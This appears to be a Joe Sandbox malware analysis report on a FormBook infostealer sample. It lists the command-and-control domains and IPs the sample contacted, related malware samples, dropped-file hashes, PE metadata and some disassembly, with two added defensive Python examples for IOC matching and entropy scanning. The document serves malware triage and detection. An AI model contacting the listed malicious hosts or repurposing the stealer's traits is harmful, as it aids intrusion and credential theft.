http://digi-searches.com/px.js?ch=1 | ROUTE.EXE, 00000007.00000002.3231147711.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp; ROUTE.EXE, 00000007.00000002.3229283746.0000000003D86000.00000004.10000000.00040000.00000000.sdmp; YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000003276000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://einpisalpace.shop/ | firefox.exe, 0000000B.00000002.2009532526.0000000027D34000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://digi-searches.com/px.js?ch=2 | ROUTE.EXE, 00000007.00000002.3231147711.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp; ROUTE.EXE, 00000007.00000002.3229283746.0000000003D86000.00000004.10000000.00040000.00000000.sdmp; YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000003276000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
144.76.229.203 | 031233226.xyz | Germany | 24940 | HETZNER-ASDE | true
172.67.182.198 | www.grimbo.boats | United States | 13335 | CLOUDFLARENETUS | false
160.25.166.123 | www.rpa.asia | unknown | 17676 | GIGAINFRASoftbankBBCorpJP | true
13.248.169.48 | www.autonomousoid.pro | United States | 16509 | AMAZON-02US | true
188.114.97.3 | www.einpisalpace.shop | European Union | 13335 | CLOUDFLARENETUS | true
209.74.79.40 | www.unlimitu.website | United States | 31744 | MULTIBAND-NEWHOPEUS | true
104.21.96.1 | www.dejikenkyu.cyou | United States | 13335 | CLOUDFLARENETUS | true
208.91.197.27 | www.deacapalla.online | Virgin Islands (British) | 40034 | CONFLUENCE-NETWORK-INCVG | true
68.66.226.119 | www.pitaloka.xyz | United States | 55293 | A2HOSTINGUS | true
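The rows marked true above are the hosts this run resolved and contacted while the injected FormBook payload walked its C2 list. The following example is added here and is not part of the Joe Sandbox report: it embeds the report's domains and IPs, parses a constructed DNS-resolution log (the line format `<timestamp> host=<client> query=<fqdn> answer=<ip>` is an assumption, as are the host names and timestamps), and scores each match. The two addresses on ASN 13335 (Cloudflare) are shared CDN front-ends that also serve unrelated sites, so an IP-only match on them is reported as low confidence; the domain is the indicator to act on for those rows. www.grimbo.boats / 172.67.182.198 is listed as false in the table and is left out.

```python
"""Match DNS-resolution log lines against the IOCs from the report's IP/domain table."""
import re
from dataclasses import dataclass

# Indicators copied from the table above. Only rows marked Malicious: true are
# included; www.grimbo.boats / 172.67.182.198 is listed there as false and is
# deliberately left out.
MALICIOUS_DOMAINS = {
    "031233226.xyz", "www.rpa.asia", "www.autonomousoid.pro",
    "www.einpisalpace.shop", "www.unlimitu.website", "www.dejikenkyu.cyou",
    "www.deacapalla.online", "www.pitaloka.xyz",
}
# Addresses on ASN 13335 (Cloudflare) are shared CDN front-ends that serve many
# unrelated sites, so an IP-only match on them is weak evidence and is scored low.
SHARED_CDN_IPS = {"188.114.97.3", "104.21.96.1"}
DEDICATED_IPS = {
    "144.76.229.203", "160.25.166.123", "13.248.169.48",
    "209.74.79.40", "208.91.197.27", "68.66.226.119",
}

# Assumed log format (constructed for this example, not a product's real format):
#   <timestamp> host=<client> query=<fqdn> answer=<ip>
LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) query=(?P<query>\S+) answer=(?P<answer>\S+)$"
)


@dataclass
class Hit:
    ts: str
    host: str
    indicator: str
    kind: str        # "domain", "ip" or "shared-cdn-ip"
    confidence: str  # "high" or "low"


def normalise(fqdn: str) -> str:
    """Lower-case and drop a trailing root dot so 'WWW.RPA.ASIA.' == 'www.rpa.asia'."""
    return fqdn.lower().rstrip(".")


def domain_matches(fqdn: str, blocklist) -> bool:
    """True if fqdn is a listed name or a subdomain of one (never a superdomain)."""
    fqdn = normalise(fqdn)
    return any(fqdn == bad or fqdn.endswith("." + bad) for bad in blocklist)


def scan_dns_log(lines):
    """Return a Hit for every parseable line whose query or answer is an indicator."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unparseable line: skip it rather than abort the scan
        query, answer = m["query"], m["answer"]
        if domain_matches(query, MALICIOUS_DOMAINS):
            hits.append(Hit(m["ts"], m["host"], normalise(query), "domain", "high"))
        elif answer in DEDICATED_IPS:
            hits.append(Hit(m["ts"], m["host"], answer, "ip", "high"))
        elif answer in SHARED_CDN_IPS:
            hits.append(Hit(m["ts"], m["host"], answer, "shared-cdn-ip", "low"))
    return hits


# Constructed sample log (not captured from the sandbox run).
SAMPLE_LOG = [
    "2025-01-10T22:05:01Z host=WS01 query=www.rpa.asia answer=160.25.166.123",
    "2025-01-10T22:05:02Z host=WS01 query=www.grimbo.boats answer=172.67.182.198",
    "2025-01-10T22:05:03Z host=WS02 query=example.com answer=104.21.96.1",
    "2025-01-10T22:05:04Z host=WS02 query=WWW.DEJIKENKYU.CYOU. answer=104.21.96.1",
    "this line is not in the expected format",
    "2025-01-10T22:05:05Z host=WS03 query=cdn.example.net answer=68.66.226.119",
]

if __name__ == "__main__":
    for hit in scan_dns_log(SAMPLE_LOG):
        print(hit)
```

Running the block over the constructed log yields four hits: two domain matches (one of them only after case and root-dot normalisation), one dedicated-IP match, and one low-confidence shared-CDN match on 104.21.96.1 for a query that is not on the list at all, which is exactly the false positive an IP-only block of Cloudflare addresses would produce.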
                                                          Joe Sandbox version:42.0.0 Malachite
                                                          Analysis ID:1588237
                                                          Start date and time:2025-01-10 23:03:57 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 9m 48s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Run name:Run with higher sleep bypass
Number of new started processes analysed:11
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:2
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:gH3LlhcRzg.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:950beb7d3de2bad234415e45b789304bd6ac6e50e6435a78f85e188f03044ae9.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@7/3@16/9
                                                          EGA Information:
                                                          • Successful, ratio: 75%
                                                          HCA Information:
                                                          • Successful, ratio: 90%
                                                          • Number of executed functions: 49
                                                          • Number of non-executed functions: 283
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          No simulations
IP context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.182.198 | rHP_SCAN_DOCUME.exe | malicious | FormBook | www.grimbo.boats/mjs1/
172.67.182.198 | inv#12180.exe | malicious | FormBook | www.grimbo.boats/kxtt/
172.67.182.198 | CJE003889.exe | malicious | FormBook | www.grimbo.boats/mjln/
160.25.166.123 | QUOTATION#050125.exe | malicious | FormBook | www.rpa.asia/bwjl/
160.25.166.123 | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | www.rpa.asia/bwjl/
160.25.166.123 | QUOTATION#050125.exe | malicious | FormBook | www.rpa.asia/bwjl/
160.25.166.123 | z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe | malicious | FormBook | www.rpa.asia/ggyo/
13.248.169.48 | fFoOcuxK7M.exe | malicious | FormBook | www.bcg.services/5onp/
13.248.169.48 | aBEh0fsi2c.exe | malicious | FormBook | www.fortevision.xyz/dash/
13.248.169.48 | EIvidclKOb.exe | malicious | FormBook | www.sfantulandrei.info/wvsm/
13.248.169.48 | bkTW1FbgHN.exe | malicious | FormBook | www.108.foundation/lnu5/
13.248.169.48 | OVZizpEU7Q.exe | malicious | FormBook | www.tals.xyz/h8xm/
13.248.169.48 | QmBbqpEHu0.exe | malicious | FormBook | www.hsa.world/09b7/
13.248.169.48 | cNDddMAF5u.exe | malicious | FormBook | www.bcg.services/5onp/
13.248.169.48 | 3HnH4uJtE7.exe | malicious | FormBook | www.shipley.group/5g1j/
13.248.169.48 | KcSzB2IpP5.exe | malicious | FormBook | www.londonatnight.coffee/yvuf/?SDC=kadexEirh/+VAO8zLOQBjj7ri78LMX6rnGwiRgKyb2lIFzAlJiRuP0wbsEUUXC8rnmyzmDulN6bnJ3eZuWUqQAzy8gMCuzUMeqhoyPM0gWyFgi2HaQ==&mH=CpePy0P
13.248.169.48 | TU0kiz3mxz.exe | malicious | FormBook | www.cleans.xyz/m25s/?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW
Domain context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.rpa.asia | QUOTATION#050125.exe | malicious | FormBook | 160.25.166.123
www.rpa.asia | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | 160.25.166.123
www.rpa.asia | QUOTATION#050125.exe | malicious | FormBook | 160.25.166.123
www.rpa.asia | z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe | malicious | FormBook | 160.25.166.123
www.grimbo.boats | FG5wHs4fVX.exe | malicious | FormBook | 104.21.18.171
www.grimbo.boats | smQoKNkwB7.exe | malicious | FormBook | 104.21.18.171
www.grimbo.boats | PO_62401394_MITech_20250601.exe | malicious | FormBook | 104.21.18.171
www.grimbo.boats | rHP_SCAN_DOCUME.exe | malicious | FormBook | 172.67.182.198
www.grimbo.boats | Order Inquiry.exe | malicious | FormBook | 104.21.18.171
www.grimbo.boats | Payment Receipt.exe | malicious | FormBook | 104.21.18.171
www.grimbo.boats | inv#12180.exe | malicious | FormBook | 172.67.182.198
www.grimbo.boats | CJE003889.exe | malicious | FormBook | 172.67.182.198
www.einpisalpace.shop | 1162-201.exe | malicious | FormBook | 188.114.96.3
www.dejikenkyu.cyou | SW_48912.scr.exe | malicious | FormBook | 104.21.80.1
www.unlimitu.website | PO 1202495088.exe | malicious | FormBook | 209.74.79.40
www.deacapalla.online | 9MZZG92yMO.exe | malicious | FormBook | 208.91.197.27
www.deacapalla.online | NWPZbNcRxL.exe | malicious | FormBook | 208.91.197.27
ASN context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HETZNER-ASDE | frosty.x86.elf | malicious | Mirai | 78.47.94.125
HETZNER-ASDE | KcSzB2IpP5.exe | malicious | FormBook | 136.243.64.147
HETZNER-ASDE | NWPZbNcRxL.exe | malicious | FormBook | 136.243.64.147
HETZNER-ASDE | 4hQFnbWlj8.exe | malicious | Vidar | 95.217.25.228
HETZNER-ASDE | 4hQFnbWlj8.exe | malicious | Vidar | 95.217.25.228
HETZNER-ASDE | QUOTATION-9044456778.pdf (83kb).com.exe | malicious | PureLog Stealer, Quasar | 195.201.57.90
HETZNER-ASDE | http://pdfdrive.com.co | malicious | Unknown | 178.63.248.53
HETZNER-ASDE | 1162-201.exe | malicious | FormBook | 136.243.64.147
HETZNER-ASDE | 3.elf | malicious | Unknown | 197.242.86.251
GIGAINFRASoftbankBBCorpJP | frosty.x86.elf | malicious | Mirai | 60.121.97.189
GIGAINFRASoftbankBBCorpJP | frosty.sh4.elf | malicious | Mirai | 60.107.97.85
GIGAINFRASoftbankBBCorpJP | sora.arm.elf | malicious | Mirai | 126.58.120.103
GIGAINFRASoftbankBBCorpJP | 5.elf | malicious | Unknown | 218.134.63.197
GIGAINFRASoftbankBBCorpJP | 6.elf | malicious | Unknown | 126.240.48.187
GIGAINFRASoftbankBBCorpJP | armv4l.elf | malicious | Unknown | 126.91.40.37
GIGAINFRASoftbankBBCorpJP | armv6l.elf | malicious | Unknown | 126.164.100.243
GIGAINFRASoftbankBBCorpJP | armv5l.elf | malicious | Unknown | 60.90.173.14
GIGAINFRASoftbankBBCorpJP | 3.elf | malicious | Unknown | 126.91.154.87
GIGAINFRASoftbankBBCorpJP | Fantazy.sh4.elf | malicious | Unknown | 126.104.203.9
CLOUDFLARENETUS | M7XS5C07kV.exe | malicious | FormBook | 172.67.186.192
CLOUDFLARENETUS | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT | 104.21.80.1
CLOUDFLARENETUS | UF7jzc7ETP.exe | malicious | MassLogger RAT | 104.21.48.1
CLOUDFLARENETUS | 9Yn5tjyOgT.exe | malicious | GuLoader, MassLogger RAT | 104.21.32.1
CLOUDFLARENETUS | VQsnGWaNi5.exe | malicious | Snake Keylogger | 104.21.48.1
CLOUDFLARENETUS | 6ZoBPR3isG.exe | malicious | GuLoader, MassLogger RAT | 104.21.80.1
CLOUDFLARENETUS | http://@1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ= | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | JgE2YgxSzB.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.16.1
CLOUDFLARENETUS | 87J30ulb4q.exe | malicious | Unknown | 104.21.96.1
CLOUDFLARENETUS | lsc5QN46NH.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.80.1
                                                          No context
                                                          No context
                                                          Process:C:\Windows\SysWOW64\ROUTE.EXE
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1221538113908904
                                                          Encrypted:false
                                                          SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                          MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                          SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                          SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                          SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\gH3LlhcRzg.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):287232
                                                          Entropy (8bit):7.994703663811101
                                                          Encrypted:true
                                                          SSDEEP:6144:UlSDc5xOrnkC4EfOcc4X/9Rr5UkGbLkSUMbw8:UcDc4rR4EfObq19fGHkabL
                                                          MD5:80CE597F717F01D4AEAB5E3417EA0E6E
                                                          SHA1:BB8A4F2B2E038C8D21B67857DB20EB98CB3AEFCB
                                                          SHA-256:A1F87BA40D991E6A353886770B761D7DF4C488ACD781292706904542930FBA64
                                                          SHA-512:566B27B3AB432DED919A053CA63ACE1AEBE4752946F1F25993A0AD048E9FB4C34DAF5DE2B70139177DD2297A7155EAE7577EBA88DF6921F9A9B68732926B0116
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:...C:NGO0FAL..78.MJLS25Lp2GNTC9NGO4FALP278BMJLS25L02GNTC9NGO.FAL^-.6B.C.r.4....&=0.>5 S4 !pQVV,">l1W.>E\g':c}..oY)%)~?:2fMJLS25LI3N.i#^.z/S.|,7.-..p,4./..{.3.#...&&..[TP.--.S25L02GN..9N.N5F..`i78BMJLS2.L23LO_C9.CO4FALP278.YJLS"5L0RCNTCyNG_4FANP218BMJLS23L02GNTC9.CO4DALP278@M..S2%L0"GNTC)NG_4FALP2'8BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278l9/4'25Ld|CNTS9NG.0FA\P278BMJLS25L02gNT#9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FAL
                                                          Process:C:\Users\user\Desktop\gH3LlhcRzg.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):287232
                                                          Entropy (8bit):7.994703663811101
                                                          Encrypted:true
                                                          SSDEEP:6144:UlSDc5xOrnkC4EfOcc4X/9Rr5UkGbLkSUMbw8:UcDc4rR4EfObq19fGHkabL
                                                          MD5:80CE597F717F01D4AEAB5E3417EA0E6E
                                                          SHA1:BB8A4F2B2E038C8D21B67857DB20EB98CB3AEFCB
                                                          SHA-256:A1F87BA40D991E6A353886770B761D7DF4C488ACD781292706904542930FBA64
                                                          SHA-512:566B27B3AB432DED919A053CA63ACE1AEBE4752946F1F25993A0AD048E9FB4C34DAF5DE2B70139177DD2297A7155EAE7577EBA88DF6921F9A9B68732926B0116
                                                          Malicious:false
                                                          Preview:...C:NGO0FAL..78.MJLS25Lp2GNTC9NGO4FALP278BMJLS25L02GNTC9NGO.FAL^-.6B.C.r.4....&=0.>5 S4 !pQVV,">l1W.>E\g':c}..oY)%)~?:2fMJLS25LI3N.i#^.z/S.|,7.-..p,4./..{.3.#...&&..[TP.--.S25L02GN..9N.N5F..`i78BMJLS2.L23LO_C9.CO4FALP278.YJLS"5L0RCNTCyNG_4FANP218BMJLS23L02GNTC9.CO4DALP278@M..S2%L0"GNTC)NG_4FALP2'8BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278l9/4'25Ld|CNTS9NG.0FA\P278BMJLS25L02gNT#9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FAL
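The Entropy (8bit) and Encrypted fields in the dropped-file entries above are what separate the 287232-byte blob written by gH3LlhcRzg.exe (7.9947 bits per byte, Encrypted: true) from the SQLite copy written by ROUTE.EXE (1.1222 bits per byte, Encrypted: false). The example below is added here and is not part of the report: it computes that statistic and adds a windowed variant that locates a high-entropy region inside a file whose overall entropy is unremarkable, which a single file-level number such as the 7.17 reported for the main executable will not reveal. The whole-file threshold of 7.9 and the per-window threshold of 7.5 are assumptions chosen for illustration, not the sandbox's own cut-offs; the per-window value is lower because the entropy estimate on a 1 KiB sample of random bytes comes out around 7.8, since rare byte values are undercounted in a small window. The sparse page, random blob and container are constructed inputs, not the sandbox's files.

```python
"""8-bit Shannon entropy, the statistic behind the report's Entropy (8bit) field."""
import math
import random
from collections import Counter

# Thresholds are assumptions for this example, not Joe Sandbox's own cut-offs.
FILE_THRESHOLD = 7.9    # whole-file entropy above this is treated as packed/encrypted
WINDOW_THRESHOLD = 7.5  # per-window value is lower: a 1 KiB sample of random bytes
                        # measures about 7.8 because rare byte values are undercounted
WINDOW = 1024


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a single repeated value, 8.0 for a uniform spread."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(data: bytes) -> bool:
    """File-level check equivalent to the Encrypted flag in the dropped-file table."""
    return shannon_entropy(data) > FILE_THRESHOLD


def high_entropy_regions(data: bytes, window: int = WINDOW,
                         threshold: float = WINDOW_THRESHOLD):
    """Return [(start, end), ...] byte ranges whose windows all exceed threshold.

    Adjacent hot windows are merged into one region; a region still open at the
    end of the data is closed at len(data).
    """
    regions, start = [], None
    for off in range(0, len(data), window):
        hot = shannon_entropy(data[off:off + window]) > threshold
        if hot and start is None:
            start = off
        elif not hot and start is not None:
            regions.append((start, off))
            start = None
    if start is not None:
        regions.append((start, len(data)))
    return regions


# Constructed inputs (not the sandbox's files): a sparse database page, a random
# blob standing in for an encrypted payload, and a container that hides the
# blob between two runs of zero padding.
SPARSE_PAGE = b"SQLite format 3\x00" + b"\x00" * 2032
RANDOM_BLOB = random.Random(1).randbytes(65536)
CONTAINER = b"\x00" * 8192 + RANDOM_BLOB[:4096] + b"\x00" * 8192

if __name__ == "__main__":
    for name, blob in (("sparse page", SPARSE_PAGE), ("random blob", RANDOM_BLOB),
                       ("container", CONTAINER)):
        print(f"{name:12s} entropy={shannon_entropy(blob):.4f} "
              f"encrypted={looks_encrypted(blob)} "
              f"hot regions={high_entropy_regions(blob)}")
```

The container is the case worth noting: its whole-file entropy is low enough that looks_encrypted returns False, yet the windowed scan reports the 4 KiB random payload at offsets 8192 to 12288. When triaging a dropper, run the windowed check over the sample itself, not only over what it drops.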
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.167688385562831
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:gH3LlhcRzg.exe
                                                          File size:1'187'328 bytes
                                                          MD5:a238864f937038d6fe39092719a1eff0
                                                          SHA1:64dee05a230179d9b8baf50fba1722efecc84a67
                                                          SHA256:950beb7d3de2bad234415e45b789304bd6ac6e50e6435a78f85e188f03044ae9
                                                          SHA512:ba513b2f7d17430df6a19eff55b6fea0de1f8be1ffe0a0aaf458796c1fb30501b31e94be3c0216d18fc3ed33f22475e522877296be3c1df976bd8d426a60473b
                                                          SSDEEP:24576:qu6J33O0c+JY5UZ+XC0kGso6Fa7LYzBm/+jQPHkCWY:cu0c++OCvkGs9Fa7LYU+uHQY
                                                          TLSH:9245BF2273DDC360CB669173BF6AB7016EBF7C614630B95B2F880D7DA950161262C7A3
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                          Icon Hash:aaf3e3e3938382a0
                                                          Entrypoint:0x427dcd
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x675788B1 [Tue Dec 10 00:17:53 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:afcdf79be1557326c854b6e20cb900a7
Instruction
call 00007F3CDD7F82DAh
jmp 00007F3CDD7EB0A4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F3CDD7EB22Ah
cmp edi, eax
jc 00007F3CDD7EB58Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F3CDD7EB229h
rep movsb
jmp 00007F3CDD7EB53Ch
cmp ecx, 00000080h
jc 00007F3CDD7EB3F4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F3CDD7EB230h
bt dword ptr [004BE324h], 01h
jc 00007F3CDD7EB700h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F3CDD7EB3CDh
test edi, 00000003h
jne 00007F3CDD7EB3DEh
test esi, 00000003h
jne 00007F3CDD7EB3BDh
bt edi, 02h
jnc 00007F3CDD7EB22Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F3CDD7EB233h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F3CDD7EB285h
bt esi, 03h
jnc 00007F3CDD7EB2D8h
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD4 build 31101
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x595ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x121000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
